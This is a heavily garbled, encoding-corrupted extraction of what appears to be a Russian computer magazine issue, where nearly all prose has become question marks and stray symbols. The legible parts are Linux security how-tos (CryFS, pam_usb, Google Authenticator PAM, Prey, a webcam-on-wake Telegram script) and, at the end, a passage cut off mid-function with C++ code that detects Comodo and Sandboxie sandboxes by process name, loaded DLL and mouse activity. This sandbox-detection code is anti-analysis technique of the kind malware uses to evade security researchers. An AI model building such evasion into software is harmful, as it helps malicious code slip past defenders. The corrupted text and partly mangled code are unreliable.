???�??�??� ??,� ???� ???� ????� ?� ??????�?.� ????�?� ?????� ?azv� ?� ???�??� ???�??
????�???,�??�??????�???�?????�???????�??�???�?�??�?�??�??�??????�
????��??�???�??�???�(????�a)�???�?????�?????�??�??�(????�z).
??�?????�????�?��?????�????�??�??��?????�?�???�???:
$ rsync --delete --progress -e 'ssh -p 2222' -azv ~/Books 192.168.31.236:/sdcard/Books
?????�?�?????�?????�???� ??delete,�??�?�??�???�??�?,�??????�???
???�???�?�?????�???�?????�?爚/Books.
??� ????�????� ???� ????�?� ?????�????� rsync� ?????� ???�???� ???�????
???????�??�??�?.�??�?�??�?�???�???,�??�?�?????�?????�???� ??par?
tial,� ???????� ???�????� rsync� ???�?????� ??????�??�??� ???�?� ?� ?????�?????
??�??�????�??�??�?????�????�?�????�?.
SSHBUTTON
??,� ?� ????�??�?� ??� ???�??�?????,� ???�?� ???�??�???�???�?,� ??� ???,� ????
???�??�?�???????燬SH????�??�????�?�???�??�?��??�??��???�??�??
?????�??� ?????� ??� ?????�??� SSH????�????� ???� Android� (???� ??� ConnectBot,
???�????),�???,�????�?,�?�????�??�???�????�?�?�??�?????�??�?????�
??�?????�???�???�?.
??�?�?�????,�???�????��??�???�??燬SH燽utton,�??�???�???�?????�
????�??�??�????�?�?�??�??�?????�?�??????�???�?.�????????�燬SH
button�????�??,�?�??�???�??�??????�?????�?.�???�?�????�?燬SH燽ut?
ton,�????�???�燗dd...��??�?�??�??�????�?,�????燬SH????�???,�????
?�?????.
SSH� button� ????�?� ??????�?????� ???� ???�??????� ???� ????�????� ???�?
(?????�?� systemctl� suspend� ?� halt),� ?????�?� ?� ????�??�?� ???�?????,� ????�
???�???�????� ??????� (???�????,� ???�?� mocp,� ?� ???????� ?� ???�??�????
?� ?????� ??� ????�??� ???�??,� ???�???�?� ?????????� ?????� ?????� ?????�???
????�?).
SSH燽utton
??????
??�???�?????� Android� ?� ????�?� ?� Linux� ???�???�???�?� ????�?.� ?� ????�??
??燱indows�????�?�??�?�????�?????�??�???�???,�??�????�??�??�???
?� ???�??� ?????�??� ????.� ?� ????�???�??� ???�???� ???�?� ????�???� ????�???�
???�?�??�???燣inux燬SH�爎sync,�?��???�???�?�??�?�??�?�????�????�
???�??�??�??�??�?.
?????
????????
???????
?燣INUX
??????????,
??????????????
??�?????��??????
???????????
???�??,�??�??�?????�?燷[�??�??�?�????�
??????� ??� ???�?????�??� ???�??� ?� ???????�
????� ????�??� ???� ????????� ???�??�???
???�?????,�??�?��??�?�?????�???.�??
????�??�?� ?� ???�?� ?� ????� ??????�??.
??� ???,� ???� ????� ??????�??� ???�???,� ????
?� ????� ??� ????????,� ??????� ???� ????� ?????�
?????�??.� ???� ???� ????� ??� ??????�?� ????�
???,�??�???�?�?�??�????�??�???��????�
?????????� ????�??�??� ???�????� ???�???�?
?????�???�?.
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
??????????�?????
???�??,� ???� ????�?,� ?� ????,� ?� ????�?� ?� ??????� ??� ????.� ????????� ??,� ?????
???�???�?:�????�??�????�??�??�?�??�?�????�????�??�????�??�????�
??,�??????�??�???�???�?�?????�??�?�??�???�??�????�???�??�?????.
??� ???� ??????,� ????� ??� ??� ??????�????� ???�????�??� ???�?� ?� ????� ?????� ?
???�????�??�???�??�????�??�??�?燜luxbox�??爄3?
??�??�??�?� ???�?� ?????� ???�???�?????� ???�????�????� ????�?,� ??� ?� ??
???????�????� ????�?????�?� ??� slock.� ???� ????�?� ????�??� ???�????�??,
??� ???�???� ???????� ???�????�??� ???�??�??� ???????�??,� ????� ???�?
?�????�?????�??�??�??.�??,�??�?�???�?,��??�?????�?�????�??�??
???�??.�??�??�?�?????�????�??�????�?�????,��??�??????燛nter��???�
???� ???�?????�???� ??????� ?� ????�??.� ???�??� ?????,� ????�???�??� �?????�
?????粻???�??��??�??��????,�??�???�???�?�????.
??�??�???� slock� ???�?� ???� ???�????� (???�?� ?????� ???�?????�???� ???�?),
???� ?� ????�???�??�?� ???�?� ???�??�????� ????�???.� ??� ???�??� ???�??� ????
??????�??�?爏ystemd?????�??�????�?�????�????:
[Unit]
Description=Lock X session using slock for user %i
Before=sleep.target
[Service]
User=%i
Environment=DISPLAY=:0
ExecStartPre=/usr/bin/xset dpms force suspend
ExecStart=/usr/bin/slock
[Install]
WantedBy=sleep.target
???�???� ???� ?� ????� /etc/systemd/system/slock@.service� ?� ????�????
????�(USER��???�??��??�???):
$ sudo systemctl enable slock@USER.service
???�???�???�?�???�??,�?�???�?�?�????�??�??�??????�????��???�
????�?????�?燘IOS��????�?�??�????��????�?????�??,�??�?�??�??�?
???�?.�??�??�????�???�?�??,�??�?????�???�??�?????�?��???�?,�??�?
???�?????�???�???�?�??�??�??�???�????�??�???.
???�??�???�???�??�?�??�???�?�???�?????�?????�?�??�????,�???????�
?????��??�??��??�??�?�??�?.�??�?????�?????�?�?�???�?燗TA????�????�
????,� ??� ???�??,� ????� ??????� ????????� ???�??� ???�?????� ????� ???�???�???,
??�????�??�??????�??�??�??????�???�????�????�??�??�?�??�?.
??????????�????
???�?� ???� ???????�??� ???�??�???�?� ???�???�?� ?????�?????� ???�???� ????
??�??�?�???�??�?�??�???�????�??�???.�????�??�??????�???�?�?????�
?????�??�??��??�?�??�?�????�?????�??????�(???�??�????�?�???�??
??????),� ??� ???�?� ????� ?????�???�??� ?????�????:� ???????� ???�???�??????�
???�?� ???�????� ???�????????,� ???????� ?????� ???�?????� ?????� ?� ?????� ????�
???�??.
??�???�???�???� ???�???�??� ???�???�?????�??�?� ???�?,� ????� ??????�
??????� ????�?� ???�??� /home� (??� ???????� ?� ???????�?� ????� ???�??),� ?� ????
???�???� ????�???� ???????�????�??.� ??� ???�?� ???�??� ???�??�???�?� ?????�
????�?� ?????� ????�??� ??� ????�????,� ??� ??� ????� ??� ???�???:� ????�??� ?????
?????�????�?????�??�????�?�???�?�??�???�????�??�????�???�?�???
????�?,� ?� ????� ??� ??????�??�?� ???�????�??� ??� ???� ????�?� ???�?� ???????�
???�???�?�??????�??��?????�?��????�???�???�????�????.
??� ?� ??� ????� ????�???� ????� ?????.� ???�???� EncFS� ?� CryFS� ??????�???
????????� FUSE,� ???�?� ???�???� ?????�????�??� ???�????�??� ??� ??????
????????.� ?� ??� ???????� ??� ??????� ?????�?????� ?????� ??????�?� ???�??
???????,�??�???�??????�?�???????�??�????�??�??�??�??�??????�????�
?????�???� ???�???� ?� ?� ???�????????� ???�??�???�??� ??????�?� ?� Dropbox
?�??�???�????�???�??�?????.
???� ???�????� ???�???� ??????�???� ????�???� AES?256� ?� ??????� GCM,
??� ????�???�?� ?� ?????�????.� EncFS� ???�???� ???�??� ????� ??� ??????�??�?
?�????�?�???�???�???�????�????�??�??��?�??�????,�?�????�?�???�
????�??�?� ??????�??� ???????�??� ?� ?????�???� ??????�??� ?� ???�???� ???�??.
???�???�??�???:�???�??????�??�???�???�???????,�??�?�??�???�????
???�??�?�??�?,�??�??�??�?�??�??�?,��?�??�??�??�??�???.
CryFS� ??????�?� ??� ?????�??� ???�??.� ?????�????�??� ?� ??� ???????
???????� ???�????� ???� ????�??� ???�????� ??????� ?� ?????� ??????�??� ?� ???�??
???�???�???�??�???.�???�?燙ryFS�????�?�?�??�????�???�?????�???�?
????�?,�??????�??�??�???�??��???�????燛ncFS.�???�???�??�???�???�
????�?� ?� ??????�??� EncFS,� ????� ??� ??� ??� ??????� ??� ????,� ??� ???�???� ?
??????� ?????�???�?� VeraCrypt� ???� ???�??� �???�????�??粻 ???�??�??�??
???�??????,�?????�?????�??�??�??�??????�????�???�??�???,�??????
????�?� ????????� ?� Dropbox� ???� ???�??�???�??� ????� ?????�????�??� ???�??
???�????�??�???�????.
??�???�?????燛ncFS�燙ryFS�???�?�???�?.�??�????�?�???�?????�????,
?�????�????�???�??�????�??�?????�??:
$ cryfs ~/Dropbox/box ~/crypto
?� ???�??� ???�??� ??� ???�??�???� ?????�????�??� ???????� ~/Dropbox/box
???� ~/crypto.� ???� ???�?,� ???????�??� ?� ???�?????,� ??????�?� ?� ???�??
?�????�????�??�???.
?�???�??????�??�?�??�???�??�??�??�??�??:�??�?�??�????,�??�?
GPG,�??????�?????�?�???�???????�??,�???�??????��??�????.�??�???�
????� ???� ???�??�?� ????�??� ???�?� ???�??� ???�????,� ?� ???�?� ??????�??????
???�?�??�?�????�???:
$ fusermount -u ~/crypto
??�??�????�?????�?,�????�????�???��??????燙ryFS
??????????????�??�?????
????,� ????� ???????,� ??????� ????�??�??,� ??� ????�?� ??� ????� ????�?� ??????
???�??�????,�??????��??�????�??�???�????�??�???�??�?�??�?��??�?,
???�????,�???�?�?????�??�??�?????�?�??�??�??�??�????�???,�?�???�
????� ???� ???�??� ???� ???� ???�??�????�?� ????�?� ??� ???�?� ????�??�?.� ???
?????� ??????� ?????� ???�???�???� ????� ??????� ?� ??????�?.� ?????� ???�??
?????,��??�??�?�??�??????�??????.
????�?
??�??,� ???� ???�???� ???� ???�?� ???� ???�???�?� YubiKey.� ???� USB?????,� ????�
????�???��???�??�???�??�???�??�????�?????�??�?�??�??���??�???.
???�?�????�???��??�????,�?�?�????�???�???�?�???�??�?�??????�
??????�???�??�???�?.
??�???� pam_usb�??�???�?�??�??�??�????�?????�??��??????�????
USB?????�?.� ????�??� ??????� ?????� ???�?????:� ???�???� ??????�???
??�???�?�????�??�??�??�??�??,�??????�??�???�?��???�??�???�???
???�?.�?�??�?�????�?????�??爌am_usb�??�???�?�???�??�??��???�?,
????�??� ??� ?� ???�????�???� ?� ???�?� ?� ???�??� ????� ?� ???�???,� ????� ???� ????�
????�?.
???�?�??�??�?????�???,�???�?????�????�???�??�?????�???.�????�
??????爌am_usb:
$ git clone https://github.com/aluzzardi/pam_usb.git
$ cd pam_usb
$ make
$ sudo make install
?燗rch燣inux爌am_usb�??�????�燗UR:
$ yaourt -S pam_usb
??�?????� ??� ?????� ???�??�??� ???�??� ??� ????�?� (?????� AuthKey� ?� ????�
??????�??�??):
$ sudo pamusb-conf --add-device AuthKey
???�???�???�?????�?,�??????�????�??�?????�????�?????�??��??????
????�?:
$ sudo pamusb-conf --add-user username
???�?????,�??�??�??�??�??�??,�??�???:
$ sudo pamusb-check username
??�????,� ????????� pam_usb� ?� ???�??� PAM????????.� ???� ???�?� ?????�???
????� /etc/pam.d/common?auth� (???� /etc/pam.d/system?auth� ?� Arch� Linux
?燜edora)��????�???��?????�??�?�????�???�?:
auth sufficient pam_usb.so
?� ????� ???�??� ????�?� ?????� ???�????�?� ???� ?????�?????�??.� ????� ??� ??
??????�???????�???�?????�??�????�?????�??,�??�?�??�???�?��???�?,
?�?????,�???�?�????�?�?�????:
auth required pam_usb.so
????��???,�??�????爌am_usb�?�?????�??�???�???�??�????�?�??�???�
??,� ????� ???�?� ????????� ??????� ????????�???�??� ???�?� ?� ??� ???� ?????
?????�???�????�?�?????�?�???.��???�?�??�?�????�???,�???????�??
??�??�??�???�?��?????�?????�?�??�????�?????�??.
???�??�????爌am_usb
????�???
????�?�???�?�(???��????�????��??)�??�?�????�???�???.�??�??,�??
????� ??� ???� ?� ???�?� ??� ????�????�?� ???�???�???� Google� Authenticator.� ???
?????�???� ????�???� TOTP� (Time?based� One?Time� Password,� RFC� 6238),� ????�
????�???�????�???�????�?????�??��????�??�???�??��??????�????�
????�???� ??????,� ???�???�????�???� ???�??� ???�???�???� (?� ???,� ???� ???
??????�?,�?????�?????�?�????).
Google� ???�???�?� ????�???????� Authenticator� ?� ???� ???�?� ???� ??????�
??????�??� ?� ???�?� ???�????.� ????�?� ?� ?????�??�?� ???� ?????� ??� ??????�?
??燝oogle��?�?????�???�??�??�???�(??????�?�??�?,�??�???�??�??????�
???�???�???�??�??????,�??�???�??�??�????,��??????燪R?????,�??�?
????�??�???�??�??�???�?�?????�???),�??�??�???�?�??�???�?????�?�?
???�????�?????�??��??�???�??�???�?�??�??�??????.
???�??�?�???�?????�???�?????燩AM???????爌am?google?authenticator:
$ ./bootstrap.sh
$ ./configure
$ make
$ sudo make install
?燗rch燣inux�???�??�?�???�???�??:
$ yaourt -S google-authenticator-libpam-git
??�??�????�???�??�???�??爂oogle?authenticator:
$ google-authenticator
???�??�???�???燪R????�(???�??????�???�?�?�???),�??????�???�?????
?????�???�???� ?� ???????� ???�???�??� Google� Authenticator� ??� ????�??�?,
?�??�?�?????�??�???�?�??�????.�?�??�??�???,�??�?�??�????�?�(????�
????�??� ???�??�???� ???�????�??� ???�?� ???�????� ?� ???�????),� ????�??
????�?????�?.
??�??,� ???� ?� ?� ???�??� ?� ????�??,� ?????�???� ?� /etc/pam.d/common?auth
???�?????�???�?:
auth required pam_google_authenticator.so no_increment_hotp
??�?????�??�?????�??�?�??�???�??�??�?????�???��???�?????????
????�???� ????�?� ?� ???�??� ????�????.� ???� ???�?� ????�?� ???�???� ???�??
?????��??�??�??�????.
QR????爌am?google?authenticator
?????????????
?�??????�??????,�???�???�??�????��??�??????�?�????�???????
????� ???????�??� ??� ????�???.� ???�?� ????????� ???� ????�??,� ???�?� ???�??
???�??� ?????�??,� ?� ????�?� ?????� ???�???� ?????�???�??,� ?????�??� ???�???
Find爉y爄Phone.�?�???�??�???,�??????�??�?????�?�??�??�??�?�??�????�
??��???�????,�???�?????�??�???�?????,�??�???�??�??�???�?��??�??
????�???�??�??????.
??�?� ??� ???�??� ???????� ?� ????� ???�?� ??????�???� Prey.� ??� ???�????
???� ??????�??� ?� ???�??� ??� ????� Windows,� macOS� ?� Linux.� ???� ????�???�?
???�?????� ????�??,� ?????�?� ????� ??� ????�???� ???�????,� ????�?� deb??????
?�???�??�???�?�??:
$ sudo dpkg -i prey_1.7.3_amd64.deb
?燗rch燣inux燩rey�???�燗UR:
$ yaourt -S prey-node-client
????�?� ???�???� ?????� ?� ????,� ???� ????�????�?� ?� ???�???� ??� ???� ???�??
prey_project.
???�?�???�??�?�????�????�???,�????�???�??�?????�??:
$ sudo prey config account setup
??�???�??�???�爀mail?????�?,�??�????�???�?�?????,��?�???�???�???�
??� ?????� ?????�???.� ???�?� ???�?????,� ???� ???� ??????�?,� ??????�??
?� ??????????� ???????�??� ?� ???�????�???� ???�????????� ?????�?????
??????�???��?????�????�???�??�???.
???�???�??� ???�??� Prey� ???�???�?� ??????� ???�?????�????� ??????�???,
???????�??� ??� ??� ?� ??????,� ????�???� ???�?????�??,� ???�?????�???
??????�???,� ???�???� ????�?� ???????� ???� ?????�???.� ???�?� ????????� ????�
????????�??�???�??�??��??�?????�??�?,�??�??�?�??�???�???�??�????
?�????.
???�?� ????� ?� ????,� ???� ?� ????�??� ??� ????�??�??,� ???????� ??� ?????�?
????�?� ???�??�???� ?� ??????�??� ????� ?� ?????� ????�??� ????�?� ???�????
??????,� ????�??� ????� ???????�?� ?� ?????�?� ?� ????�?� ???�??�???�?� ?� ??????�
???� Wi?Fi??????� ????�?� ???�?� ???�??????� ????�?????�?.� ???�???� ???�???,
???�?�??�?�???�??�???�???�?,�??�??�?�??�?�??????.
??�?��???�???��?????�??????�??燩rey
?????�??�?????�?�??
???�???�????�???�?��??�?????�?�??�???��??�???�?.�????�??,�?
????�??�???�??��?????,�??????�??�??????�??????,�??�??�???�???�??
???� ???� ?� ????�???� ??????�???�?� (???�??,� ????�???� ??????,� ???� ???�???�??,
????�?�?????�???爏lock).�????�??�?�??�??�??�?????�???.
???� ??????� ???????� ??????,� ???????� ?????� ??????� ???�?� ?� ???????
??????�???�???.�?�????�???�?�???�??:
#!/bin/sh
ffmpeg�y�t�f爒ideo4linux2�s�0x480�r��i�/dev/video0�f�
image2�$HOME/webcam.png�
??�???�??爐ake_photo,�?????��??????爚/bin��??�??�?�?�??????�??:
$ chmod +x ~/bin/take_photo
??�???�??�???�???????�?????,�??????�????�????�???�??�?????�??�?
???�??�????�??�?.�??�?:
#!/bin/sh
if燵�$1�爌ost燷�&&燵�$2�爏uspend燷;爐hen
牋爏udo�u�???_???_?_???????�/home/????_???_?_???????/bin/take_p
hoto
fi
??�???� ???� 00take_photo,� ??????� ?� ???????� /lib/systemd/system?sleep/
?�??�?�??�?�??�??�?�?�??????�??:
$ chmod +x /lib/systemd/system-sleep/00take_photo
??�???�??�??�??�??�??�????�???�??�????�?????�???��??�?????�??
?� ????� ~/webcam.png.� ??� ??� ?????� ???�?� ???� ????�?� ?� ?????�???� ????
????��????�??.�??�??�?�???�??�???�?爐elegram?cli.�??�?�??�?�??�???�
????�燗rch燣inux:
$ yaourt -S telegram-cli-git
??�??�???� ???�???� ?????�??� telegram?cli,� ???� ???�????� ?????� ??????�?
(phone爊umber:)��??�???�+71234567890,��????�??�??????�????�?�??
?�?????,�???�?�?????�???�?.
??�??�??�???�??�????�??�?????爚/bin/take_photo:
#!/bin/bash
ffmpeg�y�t�f爒ideo4linux2�s�0x480�r��i�/dev/video0�f�
image2�$HOME/webcam?`date`.png�
sleep�
telegram?cli�W�D�e�"send_photo燖????_???_?_?????????�$HOME/webcam.
png燻date`"
??�???� ??� ??� ????�?� ?????� ??????� ????,� ??� ?� ?????�??� ???� ?� ???� ?????�??.
?????�?� sleep� 60� ???�?� ???� ?????�??� ?????�??� ?????� ??????�??,� ???�?
????�??�????�??�??�???�?�燱i?Fi.
??????
??�?????� ????�??� ??� ???� ????�?,� ???� ????�??�?,� ???????� ??????�???� ????�
?????�????� ???�??????� ?� ????�???�?� ?� ???????� TEE???????,� ??????
??� ????�??�?� ????�?� ?� ???�?� ???�???????� ?????�???�??� ??� ????� ?????
?????.�?,�??�????�????�??�??�??,�??�??�??��?????,�?�???�?�???�
????�??�???,�??�??�??�??�??�?????.
?????
??????�?????????
????????????
apismenny@gmail.com
1
FISH燬HELL��?????�??燘ASH��?????�?�??????
?�????????
???� ???�?� ????�???� ?� ???,� ???� ?????�???� ????�?� ??� ????????
?� ??????�?????????�?????�??� ?????,� ?� ??????�?,� ???� ???�?� ???
????� ??� ???�??.� ????�?� ?????�?� ????�???� ????�???� ???� ??� ???????
??�???�??�???�???.�??�????�??�??�?�??�??�???�?� ?sh�????
????????燯X�????�???�???�?�???�?�??�?�?????�??��??????.
???�??�?�???�??�???�???�??�???�??�??�?�??�??:牜??????????
????,�??�??�??�??????�??�????!�
????�sh
???�?� ????????� ???�??????� ?sh� ???????�???�?:� ???�?� VGA,� ?????�
?????�????,� ????�??� ???�???�?� �?� ?????�?�,� ???�?????� ???�???
?????�??????,� ???�???�?� ???� ???????�??� ??????� ?� ???�???�?
??�??�??�?.
???� ??????� ?????� ?????�??� ????�??� ??� bash� ?� ???,� ?????�?,
????�????�????:� ?????�???�?� ???� ????,� ???� ?� ???�????� ??????
?� ????� ???????�?� ?� ???.� ???�????,� ????� ????????� ls� ?� ?� ??????
Tab,� ??� ?sh� ???????� ???�??� ???�??� ???????�??� ?� ????�???�??,
??????�???�?�???�???爉an.
???� ????� ?sh� ???�????�?� ????� ??� ????�??� ?� ????�???�?� ???� ????�
???�????�????�?��????�??�??�??�??,��??�?�?�???�??�???�?
???�?????.
???�????,�?�????�??�???�??�???�?,�??�?�??�????�??�???�
????�?� ?????� ???�???.� ???� ???????� ???�???�???�?� ???�????� ????�
????�?????�??�??�???燯nix,�?�??�?�????�???�?�???????
fish_config,� ??� ??� ???�?� 8000� ???�????�?� ???????�??� ?� ???�????�
????��????�???�???�??�??�?.
?�????,�???�???�?�??�??�??�?�???爖sh�?�??�?�????�??�?,
???� ???�?� ????� ?????� ???�??????� ??� ?sh� ???�???.� ??� ??????� ????�
??????� ?� ??�????�????,� ?� ????� ???�???� ????�?� ?� ???�???� ??????
?????�?�?�sh,�?�??�????�??�??�???燾ookbook.
2
FRONT-END燙HECKLIST��?????�????,�??�????
???????�????�???????�????
??�?� ????????�?� ????????� ???,� ???� ???�?� ????????,� ???�??�???
?�??�??�??�???�???�????�??,�??�????�???�???,�?�??�??�???�
??????�??� ???�??.� ????�?� ???� ???�????�???� ?� ?????�?� ???????
???????�?� ???� ???�???�?� Front?End� Checklist� ?� ????�??????� ????
???�????�?燝ithub�?�??�??�???�?�??�?.
???�??� ???????� ??� ???�???:� ???,� ???� ????� ?� ???� Head� (????� meta,
?????�??��?�????�??),�??�??�???�???燞TML,�??�???�?�????�
???,� CSS,� ????�???�??� ???�????,� JavaScript,� ???????�????,� ????�
??????�??�??�???�?????�??�?,�??�???????�燬EO.
????�???�??� ???�???� ????�???� ????�???� ??� ?????�??� ?????�?
?� ????????� ??� ???�???� ???�??�???� (low,� medium,� high),� ???�?� ????
?????�?,� ??� ???� ?????�?� ?� ???�??� ???�???.� ???�??� ??????�??
??�??�??�??�?,�???�??�??�???�(???�???�???�??�???�???!).
?� ????�?� ??????�??�??� ???�??� ????�?� ??� ????� ?????????�?.� 30
Seconds爋f燙SS��??�???��??�?????�????�??�??�??,�??????
???�?� ???�???� ???� ??????� CSS.� ???�??� ?� ?� ??????�???� ????�
?????��???�?????�?�??�?????�???.
3
QB64��????????燪UICKBASIC,�??????�????�?
????????�?????????
??�?� ??� ?????� ???�??�?� ???�????�?� ???�???� ??� ?????� ????�??,
??� ???????� ???�????�?� ???�???� ???�???????� ???�?????� ??� ???�??
FOR..NEXT,� ???�??,� ????� ?????� ???�???� (???� ???� ???????� ?????�?)
????�???��??,�??�????�?????燪uickBASIC�??�?�??�???.
???�?????,� ????�??� ???�??� ???�????�?� QuickBASIC� ???�?
?� 1990� ????.� ?????� ???� Microsoft� ???????� ???� ???�??� ?� ??????�??
????� ?????� ???�????�??� Visual� Basic,� ???????� ??� ???�????� ?????�
?????�?�燰B.Net,�???�??�?�??�?�??�??�??�??�?�?????.燪Ba?
sic� ?� ???�??�??� ???�??� QuickBASIC� ???� ???�?????�?� ?� ???�????�
????�燤S?DOS�??�???????�??�?,�?�??�?????�??燤S?DOS?
?�07�???�??�??�??牜???�????�??粻????�????�???�???�????�
??� ?� ???�???� QB64.� ?� ????� ???�???� ?????�???�?� ???,� ?� ???� ??
??� ???�?� ?� ?????�???� ?� ???????�??� ????.� ???�??�??� ?????� ????�
???????� ????�?,� ???�????�?� ???� ??????� ?� ???�????�?� ?� PNG
?�??????�燤P3,�??�?????�???�?�?�???�???�???,�???�?????
???�???,� ???�??�??� ?????� ?,� ???� ??????�??�?,� ???�???????� ????�
??????�???��????�????�??�?????��??�????�??�?????.
???� ????� QB64� ??� ???�??� ????????� ???�????�??�?� ??� ???�?
????�??� ?� ???�??�?� ???�?????�?� ???�??� ????�????:� ???� ??
�?????�,� ????�?� ?� ?????� ???�??� ???,� ???????� ??� ?????� ????�?
?� ????�??�????� ???�??.� ?� ??� ?????� ???�???,� ???,� ??????� Windows,
QB64� ??????�?� ?� Linux� ?� macOS?� ?????� ????�?� ??????�??� ????
???�?????�?????.
???���???:�??�??�??燨penGL��??�??�?????�?�???????
???�????
?� ????� ???�???� QuickBASIC� ???�???�??� ????�????,� ???????� ???
??????�?�?�??�?????牜????�??粻?牜???�?????�,�?燪B64�??�???�?
clang�?????�???�???�?�??�???�??.��13�???�?????�???�????
???�???� ???�????�??� ????� ??� QB64� ?� ????�???????� ??� ?� �??�?�,
??�?�??�??�???�???�??�?????�??��?�????�???.
??�???,� ???�??� ???�???� ???�???�??�????,� ??� ???�???� ??� ???
??????�??�??�??�??????�???�??�????.
??????
??????
?????????
??????�?????????,
????????�?�?????????
?燬ANDBOX?????????
Nik燴erof
xtahi0nix@gmail.com
??�???� ?????�?????�??� ???�???�??� ???� ??� ???�??�???�?
?� ???�????�????� ?????,� ???� ?� ??????� ????�??????:� ????
????�????� ??????�?� ?� ???�???�??�??� ???�?,� ???� ?????
????�???,� ???� ??� ??????�??� ?????� ?????�?????� ?????�???
???�????�??�??�???�?,�???�??�???�???,�??�???�????�
?????� ???�???�???� ?????�???� ?????�??�?� ???????� inter?
net� security.� ???� ???� ???�?,� ????�???�??� ???�?� ???�????
????�????� ?� ?????�??� ?????,� ???????� ??????�?� ?� ????�
?????�????� ?????,� ?� ???�??�????.� ?� ????� ??????� ?� ??????,
???� ???�????�???� sandbox????�????� ?� ??????� ???� ??????�
??????�?�??�??�????.
INFO
Sandbox� (?????�???)� ?� ???�???�??�??� ????�???�
????�??�?,��??????�???�???��??�??�???�???
?????�????�??�??�??????�??�???�?�??�????�
?????.�??�??�???,�???�???�???�?��???�???�
????�?????燱inAPI,�??????�???�???�?�??�??
?� ???�???�????,� ???�??�?????� ?????,� ?????�
????�??� ???�???� ??????,� ?� ???�?� ???�??� ?� ????
?� ???�???�???�??�??� ?????�???� ???�???�????
???�???.� ???�???�???� ???�?� ??????�???�?
???� ?????�?� ??????�??�???� ????� ?� ???� ???�???
????�???.
?????????�?????????�???????
??�?� ????� ?????�??� ???� ????�???????�?� ?????�??,� ??� ???� ????????� ??????�
??????�??.�??�?�???�?�???�???�??�???�?��???�?�????�?????�?�???�
???�??.� ???� ???�?� ??????�???� ???�???,� ???????� ???????�??� ???� ???�??�?
?�???�????燩ID�??�???�?�??�????.
DWORD爂etPIDproc(char�*爌ProcName)
{
牋燞ANDLE爌Handle�燙reateToolhelp32Snapshot(TH32CS_SNAPPROCESS,�;
牋爄f(pHandle�=燦ULL)爎eturn�
牋燩ROCESSENTRY32燩rocessEntry;
牋燚WORD爌id;
牋燩rocessEntry.dwSize�爏izeof(ProcessEntry);
牋燽ool燣oop�燩rocess32First(pHandle,�&ProcessEntry);
牋爄f(Loop�=燦ULL)爎eturn�
牋爓hile�(Loop)
牋爗
牋牋牋爄f�(strstr(ProcessEntry.szExeFile,爌ProcName))
牋牋牋爗
牋牋牋爌id�燩rocessEntry.th32ProcessID;
牋牋牋牋牋燙loseHandle(pHandle);
牋牋牋牋牋爎eturn爌id;
牋牋牋爙
牋牋牋燣oop�燩rocess32Next(pHandle,�&ProcessEntry);
牋爙
牋爎eturn�
}
??�???�????�???燙omodo營nternet燬ecurity:
if(getPIDproc("cmdvirth.exe"))爏td::cout�<�"Comodo爏andbox燿etected!
\n";
???�???� cmdvirth.exe� ????�?????�?� ???�????�????� ?� Comodo� Internet� Se?
curity.�?�???�?�???�???�??�?�??????�???�????�???燬andboxie:
if(getPIDproc("SbieSvc.exe"))爏td::cout�<�"Sandboxie燿etected!\n";
?� ?????,� ???� ????�??� ???????.� :?)� ????� ???�???� ??� ?????� ???�??,� ???�???
???�??� 0,� ?� ????�??� if� ??� ?????� ?????�???.� ???�?� ???�???� ???�??� 0,� ????
???�?????�???�???��?????�???�??�???�??�??�?��??�?????�???�???
???�??�?� Process32First� ????� ?� ??????�???� ??????� ????�???� ???�??�?
CreateToolhelp32Snapshot.
?????????�???????????�?????��????�???????
????????????
???�??� ????�??�??� ????� ?� ????�??????� ???�??�??�??� ??????� ?� ????????
????�????�??� ?????� ????�????� ??� ????�??� ?????�???� ???????� ?????�??.
???�???� ???� ???�????� ??� ??????� ???�??�?� ???� ??????� WinAPI????�???
GetModuleHandle:
BOOL燾heckLoadedDll(LPCWSTR爌DllName)
{
牋燞MODULE爃Dll�燝etModuleHandle(pDllName);
牋爄f(hDll)爎eturn燭RUE;
}
???�??�?�?�????�???燙omodo營nternet燬ecurity:
if�(checkLoadedDll(L"cmdvrt64.dll"))爏td::cout�<�"Comodo爏andbox�
detected!\n";
???�??�????�?燬andboxie:
if�(checkLoadedDll(L"sbiedll.dll"))爏td::cout�<�"Sandboxie燿etected!
\n";
???�???� GetModuleHandle()�??�???�?�??????燚LL��???????�???�?????�
???�?????�??�?�??�??�?.�???�??�???�?�??????�?????,�?�??�??�???
????,�???�??�?�??�???�???.
???�?�?????�??�??�??�??�??�??�??????��??�??�??�??�??�?,�??�?
????????�??�????,�??�??�??�???燱inAPI� OpenProcess,�????�??????�???
???�??�??�??�??��??�??�?�?????��??????�??�???� EnumProcessMod?
ules� (?� ???� ???�???� ????????� ???????�??� ?????)� ?,� ???????,� ????????� ????�
?????�?????��??????�??�???燱inAPI燝etModuleFileNameEx.
????????????�?????
???� ??????,� ????� ??� ??� ???�?� ????� ???�??�?,� ?????� ????�?� ?????�
???????????�???� ?????� ??????�??????� ????� ???�???,� ???� ?????� ????�?
??� 100%� ???????�???� ???�??�?� ???????�??� ?????�???,� ????� ???� ?????
????????� ??� ????�?� ????,� ?????� ???�???� ???� ????� ???�??�?,� ???�??�??�??
??????,�????�???�???�???�???�???�??�???�??.�??�???,�??????�????
???????�???� ?????,� ?� ???????�??� ??????�?????� ??� ????�???� ??????????
???�???� ???� ???�???� ??????�????:� ???� ????�?� ?????� ???�???�????,� ???
?????�???�???,�??�?�??????�?��??�???�??�??�??�?.
???�??� ???�??� ???�????�?� ????�???�??� sandbox????�????� ????�??
??� ??????�??�??� ??????�??.� ??� ?????�???,� ???� ???�?� ?????�?� ?????� ?????�
?????�??�?????�???�?????�??�?,��???�??�??�???�??,�?�??�?�????�
????????,� ???� ?????�???� ??� ??????�???�?.� ????�??� ????�?????� ???�???�?
?????�?????�??�??�???�??�??�???:�???�???�?????�?�???�???,�??�?
???�???�???�???��???�?�???,�??�??�????�???�???�?�????�???.
BOOL爉ouse_motion()
{
牋爄nt燾ount��
牋燩OINT爉ouse_coordinate1�爗};
牋燩OINT爉ouse_coordinate2�爗};
牋燝etCursorPos(&mouse_coordinate1);
牋燬leep(1500);
牋燝etCursorPos(&mouse_coordinate2);
牋爄f�((mouse_coordinate1.x�=爉ouse_coordinate2.x)�&&�
牋牋牋�(mouse_coordinate1.y�=爉ouse_coordinate2.y))
牋牋牋�++count;
牋燝etCursorPos(&mouse_coordinate1);
牋燬leep(1500);
牋燝etCursorPos(&mouse_coordinate2);
牋爄f�((mouse_coordinate1.x�=爉ouse_coordinate2.x)�&&�
牋牋牋�(mouse_coordinate1.y�=爉ouse_coordinate2.y))
牋牋牋�++count;
牋爄f(count��爎eturn燭RUE;
